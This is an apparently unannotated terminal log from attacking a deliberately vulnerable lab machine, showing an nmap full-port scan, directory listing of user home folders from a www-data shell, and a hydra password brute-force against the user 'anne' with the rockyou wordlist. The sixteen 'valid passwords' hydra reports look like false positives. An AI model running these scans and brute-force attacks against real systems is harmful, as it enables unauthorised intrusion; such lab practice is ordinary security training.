┌──(root㉿cyber)-[~]
└─# nmap -sS -sC -T5 -AO 192.168.2.137 -p-
Starting Nmap 7.93 (
https://nmap.org ) at 2023-06-14 00:06 CEST
Nmap scan report for bsides.vuln (192.168.2.137)
Host is up (0.00014s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 65534 65534 4096 Mar 03 2018 public
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.2.127
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 859f8b5844973398ee98b0c185603c41 (DSA)
| 2048 cf1a04e17ba3cd2bd1af7db330e0a09d (RSA)
|_ 256 97e5287a314d0a89b2b02581d536634c (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/backup_wordpress
|_http-server-header: Apache/2.2.22 (Ubuntu)
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
www-data@bsides2018:/var/www/backup_wordpress$ ls -la /home/ -R
/home/:
total 28
drwxr-xr-x 7 root root 4096 Mar 4 2018 .
drwxr-xr-x 23 root root 4096 Mar 3 2018 ..
drwxr-xr-x 19 abatchy abatchy 4096 Mar 7 2018 abatchy
drwxr-xr-x 2 anne anne 4096 Mar 4 2018 anne
drwxr-xr-x 2 doomguy doomguy 4096 Mar 3 2018 doomguy
drwxr-xr-x 2 john john 4096 Mar 3 2018 john
drwxr-xr-x 2 mai mai 4096 Mar 3 2018 mai
/home/abatchy:
total 108
drwxr-xr-x 19 abatchy abatchy 4096 Mar 7 2018 .
drwxr-xr-x 7 root root 4096 Mar 4 2018 ..
-rw------- 1 abatchy abatchy 334 Mar 7 2018 .ICEauthority
-rw------- 1 abatchy abatchy 0 Mar 7 2018 .Xauthority
-rw------- 1 abatchy abatchy 16 Mar 7 2018 .bash_history
drwx------ 11 abatchy abatchy 4096 Mar 7 2018 .cache
drwx------ 8 abatchy abatchy 4096 Mar 7 2018 .config
drwx------ 3 abatchy abatchy 4096 Mar 7 2018 .dbus
-rw-r--r-- 1 abatchy abatchy 25 Mar 7 2018 .dmrc
drwx------ 3 abatchy abatchy 4096 Mar 7 2018 .gconf
drwx------ 4 abatchy abatchy 4096 Mar 7 2018 .gnome2
-rw-rw-r-- 1 abatchy abatchy 147 Mar 7 2018 .gtk-bookmarks
drwx------ 2 abatchy abatchy 4096 Mar 6 2018 .gvfs
drwxr-xr-x 3 abatchy abatchy 4096 Mar 7 2018 .local
drwx------ 3 abatchy abatchy 4096 Mar 7 2018 .mission-control
drwx------ 2 abatchy abatchy 4096 Mar 7 2018 .pulse
-rw------- 1 abatchy abatchy 256 Mar 7 2018 .pulse-cookie
-rw------- 1 abatchy abatchy 10431 Mar 7 2018 .xsession-errors
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Desktop
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Documents
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Downloads
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Music
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Pictures
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Public
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Templates
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Videos
/home/abatchy/.local/share:
total 24
drwxr-xr-x 5 abatchy abatchy 4096 Mar 7 2018 .
drwxr-xr-x 3 abatchy abatchy 4096 Mar 7 2018 ..
-rw-rw-r-- 1 abatchy abatchy 0 Mar 7 2018 .converted-launchers
-rw-rw-r-- 1 abatchy abatchy 834 Mar 7 2018 gsettings-data-convert
drwxrwxr-x 2 abatchy abatchy 4096 Mar 7 2018 icc
drwx------ 3 abatchy abatchy 4096 Mar 7 2018 telepathy
drwx------ 3 abatchy abatchy 4096 Mar 7 2018 zeitgeist
/home/doomguy:
total 32
drwxr-xr-x 2 doomguy doomguy 4096 Mar 3 2018 .
drwxr-xr-x 7 root root 4096 Mar 4 2018 ..
-rw-r--r-- 1 doomguy doomguy 220 Mar 3 2018 .bash_logout
-rw-r--r-- 1 doomguy doomguy 3486 Mar 3 2018 .bashrc
-rw-r--r-- 1 doomguy doomguy 675 Mar 3 2018 .profile
-rw-r--r-- 1 doomguy doomguy 8445 Mar 3 2018 examples.desktop
/home/john:
total 32
drwxr-xr-x 2 john john 4096 Mar 3 2018 .
drwxr-xr-x 7 root root 4096 Mar 4 2018 ..
-rw-r--r-- 1 john john 220 Mar 3 2018 .bash_logout
-rw-r--r-- 1 john john 3486 Mar 3 2018 .bashrc
-rw-r--r-- 1 john john 675 Mar 3 2018 .profile
-rw-r--r-- 1 john john 8445 Mar 3 2018 examples.desktop
/home/mai:
total 32
drwxr-xr-x 2 mai mai 4096 Mar 3 2018 .
drwxr-xr-x 7 root root 4096 Mar 4 2018 ..
-rw-r--r-- 1 mai mai 220 Mar 3 2018 .bash_logout
-rw-r--r-- 1 mai mai 3486 Mar 3 2018 .bashrc
-rw-r--r-- 1 mai mai 675 Mar 3 2018 .profile
-rw-r--r-- 1 mai mai 8445 Mar 3 2018 examples.desktop
www-data@bsides2018:/var/www/backup_wordpress$
┌──(root㉿cyber)-[~]
└─# hydra -l anne -P /usr/share/wordlists/rockyou.txt http-get://192.168.2.137/backup_wordpress
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (
https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-14 00:56:27
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344405 login tries (l:1/p:14344405), ~896526 tries per task
[DATA] attacking
http://192.168.2.137:80/backup_wordpress
[80][http-get] host: 192.168.2.137 login: anne password: imdrippinbiatch
[80][http-get] host: 192.168.2.137 login: anne password: 123456
[80][http-get] host: 192.168.2.137 login: anne password: sqluserrootpassw0r4
[80][http-get] host: 192.168.2.137 login: anne password: hostinger
[80][http-get] host: 192.168.2.137 login: anne password: y0uC@n'tbr3akIT
[80][http-get] host: 192.168.2.137 login: anne password: 12345
[80][http-get] host: 192.168.2.137 login: anne password: 123456789
[80][http-get] host: 192.168.2.137 login: anne password: password
[80][http-get] host: 192.168.2.137 login: anne password: iloveyou
[80][http-get] host: 192.168.2.137 login: anne password: princess
[80][http-get] host: 192.168.2.137 login: anne password: 1234567
[80][http-get] host: 192.168.2.137 login: anne password: rockyou
[80][http-get] host: 192.168.2.137 login: anne password: 12345678
[80][http-get] host: 192.168.2.137 login: anne password: enigma
[80][http-get] host: 192.168.2.137 login: anne password: highschoolmusical
[80][http-get] host: 192.168.2.137 login: anne password: abc123
1 of 1 target successfully completed, 16 valid passwords found